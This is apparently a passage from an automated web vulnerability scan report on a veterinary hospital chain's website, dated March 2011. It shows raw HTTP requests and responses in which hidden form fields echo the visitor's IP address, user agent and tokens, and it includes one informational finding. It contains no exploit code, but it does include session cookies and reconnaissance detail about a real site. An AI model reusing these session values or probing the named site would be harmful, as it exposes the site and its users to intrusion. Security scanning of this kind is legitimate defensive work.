<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="token" id="token" value="da3b15eadd9ef1b522fdccad42853c5c" />
           <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/hanson" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" />
           <input type="hidden" name="guid" id="guid" value="" />
           <input type="hidden" name="source" id="source" value="hanson" />
           <input type="hidden" name="appt_type" value="appt" />
       </form>
<p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. For more information, see the <a href="http://www.vcahospitals.com/hanson/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p>        <!-- Google Website Optimizer Tracking Script -->
       <script type="text/javascript">
if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+
(document.location.protocol=='https:'?'s://ssl':'://www')+
'.google-analytics.com/ga.js"></sc'+'ript>')</script>
<script type="text/javascript">
try {
var gwoTracker=_gat._getTracker("UA-8482760-2");
gwoTracker._trackPageview("/1639539707/test");
}catch(err){}</script>
<!-- End of Google Website Optimizer Tracking Script -->
                   </div><!-- .content -->
                   <div class="nav-page">
<h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3>
                       <div id="pictogram"><img src="http://www.vcahospitals.co
...[SNIP]...

Request 2

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="token" id="token" value="d06ff4a968334fca7610b3fb80c4f351" />
           <input type="hidden" name="referer" id="referer" value="" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/appt.html" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13" />
           <input type="hidden" name="guid" id="guid" value="" />
           <input type="hidden" name="source" id="source" value="hanson" />
           <input type="hidden" name="appt_type" value="appt" />
       </form>
<p><span class="required"><strong>Important Notice:</strong></span><br />Do not use the appointment form in case of an emergency. Call us right away.</p><p>We will call you back to confirm your appointment within one business day during operating hours. Need to change your appointment? Just call us 24 hours before your scheduled time.</p><p>We respect your privacy and will not share your information with other parties. For more information, see the <a href="http://www.vcahospitals.com/hanson/privacy-policy.html" title="VCA Privacy Policy">VCA Privacy Policy</a>.</p>        <!-- Google Website Optimizer Tracking Script -->
       <script type="text/javascript">
if(typeof(_gat)!='object')document.write('<sc'+'ript src="http'+
(document.location.protocol=='https:'?'s://ssl':'://www')+
'.google-analytics.com/ga.js"></sc'+'ript>')</script>
<script type="text/javascript">
try {
var gwoTracker=_gat._getTracker("UA-8482760-2");
gwoTracker._trackPageview("/1639539707/test");
}catch(err){}</script>
<!-- End of Google Website Optimizer Tracking Script -->
                   </div><!-- .content -->
                   <div class="nav-page">
<h3>3 simple steps to set <br />up an appointment <br />for your pet:</h3>
                       <div id="pictogram"><img src="http://www.vcahospitals.com/hanson/image/hospital-main.jpg"
...[SNIP]...

6.2. http://www.vcahospitals.com/main/offer  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer

Request 1

GET /main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="token" id="token" value="120e7c22790ed42734da72210579f877" />
           <input type="hidden" name="guid" id="guid" value="04BE5E58-E0C0-4263-A98D-0DE95E71916F" />
           <input type="hidden" name="referer" id="referer" value="http://www.vcahospitals.com/main/offer/thank-you.html?" />
           <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer?&optin=1&guid=2505B0C6-B6AA-4144-878F-54873D353284" />
           <input type="hidden" name="ipaddress" id="ipaddress" value="173.193.214.243" />
           <input type="hidden" name="useragent" id="useragent" value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" />
           <input type="hidden" name="formtype" id="formtype" value="CORP" />
           <input type="hidden" name="newmex" id="newmex" value="0" />
           <input type="hidden" name="date" value="1307084400" />
           <input type="hidden" name="tollfree" value="866-825-8416" />
       </form>